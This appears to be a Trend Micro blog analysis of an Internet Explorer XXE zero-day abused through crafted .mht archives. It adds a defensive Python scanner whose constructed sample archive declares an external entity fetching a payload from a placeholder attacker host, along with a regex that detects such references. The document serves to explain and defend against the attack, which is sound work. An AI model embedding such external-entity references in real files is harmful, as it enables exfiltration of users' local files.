Analyzing Zero-Day XML XXE Injection Vulnerability – Trend Micro

By: Ranga Duraisamy, Kassiane Westell
Updated as of May 7, 2019, 6:30PM PDT to include an updated TippingPoint MainlineDV filter/rule as well as clarify descriptions on opening a new duplicate tab and how the vulnerability is triggered manually.
A zero-day extensible markup language (XML) external entity (XXE) injection vulnerability in Microsoft Internet Explorer (IE) was recently disclosed by security researcher John Page. An attacker can reportedly exploit this vulnerability to steal confidential information or exfiltrate local files from the victim’s machine. Page tested the vulnerability in the latest version of IE (11) with current patches on Windows 7 and 10, and Windows Server 2012 R2 operating systems. We looked at its attack chain to better understand how the security flaw works and how it can be mitigated. XXE injection works by exploiting an XML parser with an improperly restricted XML external entity reference (CWE-611), which is used to access unauthorized content.
XXE injection also exploits a misconfigured document type definition (DTD; CWE-827), which is used to define document types for markup languages like XML. For example, an attacker can use a malicious XML file with an external entity reference that abuses the ‘file://’ protocol to access local files, or ‘http://’ to access files on web servers.
In the case of the vulnerability reported by Page, the security flaw is triggered when a specially crafted MIME HTML web archive (.mht) file is opened and the user interacts with the browser, with actions such as opening a new duplicate tab in IE (Ctrl+K) or printing a file (Ctrl+P). However, the user interaction can be simulated by JavaScript functions like window.print(). Once the user opens the malicious .mht file, the attacker would be able to exfiltrate files from the user’s system. Note that successfully exploiting this flaw relies heavily on social engineering. For instance, attackers have to lure the user into downloading a malicious .mht file and manually triggering the vulnerability (i.e., opening the file).
Page disclosed the vulnerability, and we shared our analysis with Microsoft, which released this official statement: “Internet Explorer alone does not permit this type of malicious behavior. An attacker must trick or convince a user into downloading a malicious document through a socially engineered scheme, for example a spam email attachment or phishing campaign that triggers a download. The file must then be opened with the browser. To guard against this scheme, practice safe computing habits online, such as avoid downloading and opening untrusted files from the Internet.”
Vulnerability impact
An attacker who successfully exploits this vulnerability could gain access to sensitive files on the user’s system. Successful exploitation could also provide reconnaissance information that can be used to execute more attacks or launch more payloads. For instance, it can divulge the client’s installed applications, network configuration, privileges, and details of antivirus protection to an attacker. The attacker could then use the obtained information to gain a foothold into the affected system’s network.
While XXE injections/attacks aren’t new, they can pose significant security risks. In fact, XXE attacks are listed among the Open Web Application Security Project’s (OWASP) top security risks to applications, and they have been found in features of popular software and tools. The abuse of .mht files as an attack vector is also notable, as .mht files are also known to be abused by exploit kits and threats like information stealers.
Attack chain analysis
In order for the security flaw to be exploited, a malicious XML file has to be placed on the attacker’s hypertext transfer protocol (HTTP) server. This XML file specifies, in its ENTITY declarations, the files that are to be exfiltrated from the user’s system. In turn, that XML file has to be referenced as an external entity in the malicious MHTML file, which the user would then open manually on their machine.

Figure 1. A malicious XML file that specifies the files to extract from the user’s system
The attacker must convince the user to download the malicious MHTML file through external attack vectors, such as a socially engineered spam email attachment or a phishing campaign. The email client must then open the malicious file with IE. Note that IE is the default application used to open MHTML files on all versions of Windows, so the user does not need to specify the application. As shown in Figure 3, the vulnerable IE client will send a GET request to the attacker’s server to retrieve the malicious XML file once the malicious MHTML file is opened.

Figure 2. Sample MHTML file that uses the XXE vulnerability in IE to download a malicious XML file from the attacker’s machine

Figure 3. Packet capture of first request sent from the client to the attacker’s server to get the malicious XML file
As can be seen from Figure 1, the malicious XML file contains details of files specified for exfiltration, along with the uniform resource identifier (URI) of the attacker-controlled server. The contents of the files that the attacker referenced in the malicious XML are sent back to the attacker’s server as per the URI path mentioned in the same XML file. This will then be displayed on the attacker’s end.
Figure 4. Packet capture of the second request sent from the client to the attacker’s server that sends the contents of the attacker’s target file
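The attack chain above hinges on an .mht archive that declares an external entity pointing at an attacker-controlled URI. As an added example (not code from the article or from the researcher’s proof of concept), the following Python scanner parses an .mht file as MIME, decodes each text part, and reports any DOCTYPE or ENTITY declaration whose SYSTEM/PUBLIC identifier points at an http://, https://, file:// or ftp:// location. The sample archive and the attacker.invalid host name are constructed for the demonstration.

```python
import email
import re
from email import policy

# Constructed sample .mht (not the researcher's PoC): an MHTML archive whose
# HTML part embeds an XML island declaring an external entity that points at
# a remote URI. attacker.invalid is a placeholder host, not a real indicator.
SAMPLE_MHT = b"""Subject: Sample page
MIME-Version: 1.0
Content-Type: multipart/related; type="text/html"; boundary="----=_Part_1"

------=_Part_1
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: 7bit

<html><body><p>hello</p>
<xml>
<!DOCTYPE doc [ <!ENTITY ext SYSTEM "http://attacker.invalid/payload.xml"> ]>
<doc>&ext;</doc>
</xml>
</body></html>
------=_Part_1--
"""

# Matches <!ENTITY [%] name SYSTEM "uri"> and <!DOCTYPE root SYSTEM "uri">,
# i.e. external entity / external DTD references (CWE-611, CWE-827 patterns).
# '[' is excluded from the span so a DOCTYPE with an internal subset does not
# swallow the ENTITY declarations nested inside it.
EXTERNAL_REF = re.compile(
    r'<!(?:ENTITY\s+%?\s*(?P<ent>\S+)|DOCTYPE\s+(?P<root>\S+))'
    r'[^>\[]*?\b(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"(?P<uri>[^"]+)"',
    re.IGNORECASE,
)

REMOTE_OR_LOCAL = {"http", "https", "file", "ftp"}


def scan_mht(data: bytes) -> list:
    """Return one finding per external-entity/DTD reference in any text part."""
    msg = email.message_from_bytes(data, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        body = part.get_content()  # decoded per Content-Transfer-Encoding
        for m in EXTERNAL_REF.finditer(body):
            uri = m.group("uri")
            scheme = uri.split(":", 1)[0].lower() if ":" in uri else ""
            findings.append({"part": part.get_content_type(),
                             "decl": "ENTITY" if m.group("ent") else "DOCTYPE",
                             "uri": uri, "scheme": scheme})
    return findings


def is_suspicious(findings: list) -> bool:
    """True if any declaration fetches content over the network or from disk."""
    return any(f["scheme"] in REMOTE_OR_LOCAL for f in findings)
```

Running `scan_mht(SAMPLE_MHT)` yields a single ENTITY finding with scheme http, which `is_suspicious` flags; a plain HTML archive with no DTD declarations produces no findings.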
Trend Micro solutions
As of this writing, Microsoft has not released a fix for this vulnerability. Users should exercise caution when opening any file from unknown sources. Successfully exploiting the vulnerability entails enticing users to open malicious files. Avoid clicking links or downloading and opening files from unsolicited sources. Ensure that the operating system and applications have the latest security updates (or use virtual patching for legacy systems). System administrators, developers, and programmers should also adopt best practices. OWASP, for instance, has a list of recommendations for preventing XXE issues.
The Trend Micro™ Deep Security™ and Vulnerability Protection solutions protect user systems from threats that may exploit this vulnerability via the following DPI rule:
Trend Micro™ TippingPoint™ customers are protected from this vulnerability via this MainlineDV filter:
Ranga Duraisamy
Vulnerability Researcher
Kassiane Westell
Vulnerability Researcher